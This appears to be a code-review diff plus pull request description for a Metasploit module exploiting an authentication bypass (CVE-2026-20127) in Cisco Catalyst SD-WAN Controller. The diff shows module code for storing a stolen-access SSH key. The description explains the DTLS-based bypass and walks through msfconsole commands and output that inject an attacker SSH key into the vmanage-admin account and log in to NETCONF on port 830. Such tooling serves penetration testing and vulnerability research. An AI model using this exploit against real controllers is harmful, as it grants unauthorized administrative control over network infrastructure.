       # If we are using an existing key supplied by the user, just show how to connect to the NETCONF service.
       print_good("Use: ssh -i <SSH_PRIVATE_KEY_FILE> vmanage-admin@#{rhost} -p 830") unless silent
     else
-      # Write SSH key files to loot directory
-      loot_path = store_loot(
+      # Write SSH key file to loot
+      privkey_path = store_loot(
         'cisco.sdwan.sshkey',
         'application/x-pem-file',
         rhost,
@@ -273,11 +273,11 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       unless silent
-        print_status("SSH private key saved to loot: #{loot_path}")
+        print_status("SSH private key saved to loot: #{privkey_path}")
         # Provide connection instructions
         print_good('Connect to NETCONF via:')
-        print_line("chmod 600 #{loot_path}")
-        print_line("ssh -i #{loot_path} vmanage-admin@#{rhost} -p 830")
+        print_line("chmod 600 #{privkey_path}")
+        print_line("ssh -i #{privkey_path} vmanage-admin@#{rhost} -p 830")
       end
     end
 

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -593,7 +593,7 @@ class MetasploitModule < Msf::Auxiliary
                      /opt/homebrew/opt/openssl@3/lib/lib#{name}.3.dylib
                      /opt/homebrew/opt/openssl/lib/lib#{name}.dylib
                      /opt/local/lib/lib#{name}.3.dylib
-                     /opt/local/lib/lib#{name}.dylib      
+                     /opt/local/lib/lib#{name}.dylib
                    ]
                  else
                    %W[lib#{name}.so]
@@ -601,6 +601,7 @@ class MetasploitModule < Msf::Auxiliary
 
     candidates.each do |path|
       next if path.start_with?('/') && !File.exist?(path)
+
       return Fiddle.dlopen(path)
     rescue Fiddle::DLError
       next

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -84,9 +84,6 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_error('Exploit failed')
     end
-  rescue ::StandardError => e
-    print_error("Module failed: #{e.message}")
-    vprint_error(e.backtrace.join("\n"))
   end
 
   private

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -475,9 +475,6 @@ class MetasploitModule < Msf::Auxiliary
     ef = OpenSSL::X509::ExtensionFactory.new
     ef.subject_certificate = cert
     ef.issuer_certificate = cert
-    cert.add_extension(ef.create_extension('basicConstraints', 'CA:TRUE', true))
-    cert.add_extension(ef.create_extension('subjectKeyIdentifier', 'hash'))
-    cert.add_extension(ef.create_extension('authorityKeyIdentifier', 'keyid:always,issuer:always'))
 
     cert.sign(key, OpenSSL::Digest.new('SHA256'))
 

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -600,6 +600,7 @@ class MetasploitModule < Msf::Auxiliary
                  end
 
     candidates.each do |path|
+      next if path.start_with?('/') && !File.exist?(path)
       return Fiddle.dlopen(path)
     rescue Fiddle::DLError
       next


### PR DESCRIPTION
## Overview

This is an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day.

The module leverages the auth bypass to inject a new public key into the `/home/vmanage-admin/.ssh/authorized_keys` file. From there we can use the corresponding private key we have to SSH into the SD-WAN Controller's NETCONF service (TCP port 830), and reconfigure the SD-WAN fabric.

You can read the [technical analysis](https://attackerkb.com/topics/bP3FMvHe7z/cve-2026-20127/rapid7-analysis) by Jonah Burgess for more details.

## Note

The auth bypass is over Datagram TLS (DTLS), over UDP port 12346. Ruby does not have native support for DTLS and the Ruby binding for OpenSSL also does not expose DTLS. To work around this, fiddle is used to get DTLS via OpenSSL to work with Ruby. This is unfortunate and accounts for around a quarter of the code for this module. I am not aware of a better workaround for this, but flagging for visability.

## Example 1 - Check

The module has a check routine if you just want to see if a target is vulnerable, but don't want to leverage the vulnerability to inject an SSH key.

```
msf > use auxiliary/admin/networking/cisco_sdwan_auth_bypass 
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > set RHOSTS 192.168.86.166
RHOSTS => 192.168.86.166
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > check
[+] 192.168.86.166:12346 - The target is vulnerable. Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
```

## Example 2 - Inject SSH key

We can leverage the auth bypass to inject a new public key (the module generates a new key pair) for the vmanage-admin user:

```
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
[*] Running module against 192.168.86.166
[*] Phase 1: DTLS handshake with self-signed certificate
[*] DTLS handshake succeeded (self-signed cert accepted)
[*] Phase 2: Waiting for CHALLENGE from server
[*] CHALLENGE received (580 bytes of challenge data)
[*] Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1
[*] Server Hello received
[*] Phase 4: Sending Hello as authenticated peer
[*] Hello response received - we are now a trusted peer
[*] Phase 5: SSH key injection into vmanage-admin authorized_keys
[*] Generating RSA 2048-bit SSH keypair
[*] SSH private key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551
[*] SSH public key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551.pub
[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260320122551_default_192.168.86.166_cisco.sdwan.sshk_431386.pem
[+] Use: ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
[*] Server responded with: REGISTER_TO_VMANAGE
[+] Authentication bypass and SSH key injection completed!
[*] Auxiliary module execution completed
```

Now we can use that SSH key to access the NETCONF service:

```console
sfewer@sfewer-ubuntu-vm:~$ ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
viptela 20.15.3 

<?xml version="1.0" encoding="UTF-8"?>
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:ietf:params:netconf:base:1.0</capability>
<capability>urn:ietf:params:netconf:base:1.1</capability>
...snip...
```